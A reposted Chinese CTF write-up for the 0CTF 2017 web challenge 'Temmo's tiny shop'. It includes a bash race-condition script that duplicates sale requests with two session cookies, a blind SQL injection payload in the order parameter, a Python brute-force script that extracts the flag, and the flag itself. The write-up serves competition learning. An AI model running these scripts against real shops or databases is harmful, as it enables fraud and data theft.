Writeup for 0CTF2017 web
来源:互联网 发布:matlab绘制矩阵点图 编辑:程序博客网 时间:2024/05/24 00:01
- Temmos tiny shop
2017年0CTF,WEB部分题目的Writeup。
Temmo’s tiny shop
本题首先要获取!HINT!,但是初始钱包里只有4000,而HINT要价8000,此处使用条件竞争(race condition)这一漏洞来提升wallet的数值。利用两个浏览器登录同一账号,使用两个COOKIE来同时进行售卖的动作,则会进行两次售卖动作。bash代码如下
#!/bin/bashcookie1="PHPSESSID=m19tgi4tq3eptm53pss14dc910"cookie2="PHPSESSID=39083e7nft6kbvkjvph29socb0"url="http://202.120.7.197/app.php"curl "$url?action=buy&id=2" -b $cookie1curl "$url?action=sale&id=2" -b $cookie1 &curl "$url?action=sale&id=2" -b $cookie2
得到HINT的提示:
OK! Now I will give some hint: you can get flag by use `select flag from ce63e444b0d049e9c899c9a0336b3c59`
接下来便是sql注入,注入点在search功能的order参数上,可以这样构造
http://202.120.7.197/app.php?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1)like(0x00),price,name)
因为没有回显,对flag进行逐个字符的爆破,遍历ascii码表,通过返回内容中商品的顺序来判断每个字符的值。python代码如下:
#!/usr/bin/pythonimport requestsurl = "http://202.120.7.197/app.php"param = "?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),{},1)like({}),price,name)"headers = {"Cookie" : "PHPSESSID=39083e7nft6kbvkjvph29socb0"}answer=''for i in range(40): for j in range(128): if j == 37: continue content = requests.get(url+param.format(str(i), hex(j)), headers=headers).content print param.format(str(i), hex(j)) print content if content.find('"id":"6"') < content.find('"id":"3"'): answer += chr(j) print chr(j) breakprint answer
可以得到flag
FLAG_R4CE_C0NDITI0N_I5_EXCITED_
OVER~
0 0
- Writeup for 0CTF2017 web
- 0CTF2017 WEB WriteUp
- 看雪CTF2017第二题lelfeiCM的writeup
- writeup-web
- 0ctf 部分web writeup.md
- 看雪CTF2017第五题 独行孤客CrackMe的writeup
- 看雪CTF2017第六题 Ericky-apk writeup(安卓so逆向)
- Writeup For WeChall
- PCTF2016 Web WriteUp
- jarvisoj WEB +MISC writeup
- 西普 部分WEB Writeup
- ZCTF2017 WEB Writeup
- NJCTF 2017 web Writeup
- NJCTF WEB Writeup
- BCTF 2017 WEB WriteUp
- HackIM web的writeup
- SniperOJ WEB writeup
- 2017 GCTF Web WriteUp
- LVS集群调度算法
- case when then else end 的使用
- 字符串的基本操作--基于堆分配存储
- java IO流、DB数据库、Web乱码问题及解决办法总结
- C++第三次实验-数组求和
- Writeup for 0CTF2017 web
- linux设备驱动之:1 总线、设备和驱动
- 1033. 旧键盘打字(20) python 篇
- MLlib学习之java实现SVD
- 蛇形填数
- CCF201703-2 学生排队(100分)
- 缓存并发
- Ubuntu系统尝鲜记
- 成为Java顶尖程序员 ,看这9本书就够了